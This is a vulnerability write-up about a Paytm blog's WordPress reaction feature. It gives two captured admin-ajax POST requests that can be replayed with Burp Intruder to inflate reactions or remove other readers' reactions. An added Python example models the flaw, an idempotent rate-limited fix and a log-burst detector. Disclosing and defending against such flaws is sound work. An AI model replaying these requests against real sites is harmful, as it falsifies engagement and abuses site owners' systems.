• Description: Abuse of Functionality is an attack technique that uses a web site’s own features and functionality to attack itself or others. Abuse of Functionality can be described as the abuse of an application’s intended functionality to perform an undesirable outcome.
    Proof of Concept:
    As a proof of concept let us take an article URL: https://entertainmentblog.paytm.com/2017/03/16/mightier-grander-power-packed-baahubali-2-trailer-out/
    Below this article there is an option to react to this article with various options. People read the article and react to it, and that also gives an impression of the article to other people.
    The functionality “React” and “Unreact” can be repeated for “n” number of times for an article.
    When we react on the above URL the HTTP request which goes is:
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: xxxxxx
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: xxxxxxx
    Content-Length: 55
    Cookie:
    Connection: close
    postid=1470&action=rns_react&reaction=love&unreact=false

    With the help of Intruder we can replay this request (With Null Payload) for n number of times to increase a particular reaction for the article.

    Similarly, when we “unreact” to any article the HTTP request which goes is:
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: xxxxx
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: xxxxx
    Content-Length: 55
    Cookie:
    Connection: close
    postid=1470&action=rns_react&reaction=love&unreact=true

    We can also intrude this with null payloads and can decrease any reaction on any article. It will be possible for a user to decrease/increase the reactions given by other people on any article.

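The following is an added example and is not code from the original post or from the plugin that serves the `rns_react` action. It models the weakness the report describes (a reaction counter that trusts every replayed request) next to an idempotent handler that records which actor reacted, so a replay of the same `postid=1470&action=rns_react&reaction=love&unreact=false` body cannot move the count beyond one per actor and `unreact=true` can only remove the caller's own reaction. It also includes a small detector that flags bursts of `admin-ajax.php` POSTs per client in constructed access-log lines. The parameter names come from the request in the post; the class names, actor identifiers, rate limit and log lines are assumptions.

```python
"""Added example, not from the original post or the plugin behind rns_react.
Parameter names (postid, reaction, unreact) follow the request in the post;
class names, actor ids, limits and log lines are hypothetical."""
from collections import Counter, defaultdict
import re
from urllib.parse import parse_qs


def parse_body(body: str) -> tuple[int, str, bool]:
    """Parse the urlencoded body from the post into (postid, reaction, unreact)."""
    p = {k: v[0] for k, v in parse_qs(body).items()}
    return int(p["postid"]), p["reaction"], p.get("unreact") == "true"


class NaiveReactionCounter:
    """Vulnerable model: each request adds or subtracts one with no record of
    who reacted, so n replays move the count by n and replayed 'unreact'
    requests erase reactions other people gave."""

    def __init__(self):
        self.counts = Counter()

    def handle(self, body: str) -> int:
        postid, reaction, unreact = parse_body(body)
        self.counts[(postid, reaction)] += -1 if unreact else 1
        return self.counts[(postid, reaction)]


class IdempotentReactionStore:
    """Hardened model: store which actor (assumed: logged-in user id or a
    server-issued signed token) gave which reaction. The count is the size of
    that set, so a replay is a no-op, and 'unreact' only removes the caller's
    own entry. A per-actor sliding window also caps request bursts."""

    def __init__(self, max_per_minute: int = 30):
        self.reacted = defaultdict(set)   # (postid, reaction) -> {actor}
        self.window = defaultdict(list)   # actor -> recent request timestamps
        self.max_per_minute = max_per_minute

    def _over_limit(self, actor: str, now: float) -> bool:
        recent = [t for t in self.window[actor] if now - t < 60.0]
        recent.append(now)
        self.window[actor] = recent
        return len(recent) > self.max_per_minute

    def handle(self, body: str, actor: str, now: float) -> dict:
        if self._over_limit(actor, now):
            return {"ok": False, "error": "rate_limited"}
        postid, reaction, unreact = parse_body(body)
        key = (postid, reaction)
        if unreact:
            self.reacted[key].discard(actor)  # only the caller's own reaction
        else:
            self.reacted[key].add(actor)      # set semantics: at most one
        return {"ok": True, "count": self.count(postid, reaction)}

    def count(self, postid: int, reaction: str) -> int:
        return len(self.reacted[(postid, reaction)])


REACT = "postid=1470&action=rns_react&reaction=love&unreact=false"
UNREACT = "postid=1470&action=rns_react&reaction=love&unreact=true"


def simulate_replay(times: int = 50) -> tuple[int, int, int]:
    """Replay the 'react' body `times` times from one client against both
    models. Returns (naive_count, hardened_count, requests_rate_limited)."""
    naive, store = NaiveReactionCounter(), IdempotentReactionStore()
    naive_count, rejected = 0, 0
    for i in range(times):
        naive_count = naive.handle(REACT)
        r = store.handle(REACT, actor="user:42", now=1000.0 + i)  # 1 req/s
        rejected += 0 if r["ok"] else 1
    return naive_count, store.count(1470, "love"), rejected


def simulate_unreact_by_other(times: int = 5) -> tuple[int, int]:
    """Two actors react, then a third replays 'unreact'. Returns
    (naive_count, hardened_count): the naive counter goes negative."""
    naive, store = NaiveReactionCounter(), IdempotentReactionStore()
    for actor in ("user:1", "user:2"):
        naive.handle(REACT)
        store.handle(REACT, actor=actor, now=1000.0)
    naive_count = 0
    for i in range(times):
        naive_count = naive.handle(UNREACT)
        store.handle(UNREACT, actor="user:99", now=1001.0 + i)
    return naive_count, store.count(1470, "love")


LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "POST /wp-admin/admin-ajax\.php')

# Constructed combined-format access-log lines, not taken from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Mar/2017:10:00:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 17
203.0.113.7 - - [16/Mar/2017:10:00:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 17
203.0.113.7 - - [16/Mar/2017:10:00:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 17
203.0.113.7 - - [16/Mar/2017:10:00:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 17
198.51.100.9 - - [16/Mar/2017:10:00:05 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 17
198.51.100.9 - - [16/Mar/2017:10:00:09 +0000] "GET /2017/03/16/some-article/ HTTP/1.1" 200 5120
"""


def admin_ajax_bursts(log_text: str, threshold: int = 3) -> dict[str, int]:
    """Count admin-ajax POSTs per (client IP, minute) and return buckets at or
    above `threshold`. Access logs lack the POST body, so keying on the
    action parameter needs plugin-side logging instead."""
    buckets = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ip, ts = m.group(1), m.group(2)
            minute = ts[: ts.rfind(":")]  # drop seconds: '16/Mar/2017:10:00'
            buckets[(ip, minute)] += 1
    return {f"{ip} {minute}": n for (ip, minute), n in buckets.items() if n >= threshold}
```

In a WordPress handler the same idea maps to: verify the AJAX nonce (`check_ajax_referer()`), identify the actor (user id, or a signed cookie for anonymous readers), store reactions as rows keyed on (post, actor) with the count derived from them, and reject on a per-actor rate limit; an empty `Cookie:` header as in the captured requests is itself a sign that nothing ties a request to a visitor.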
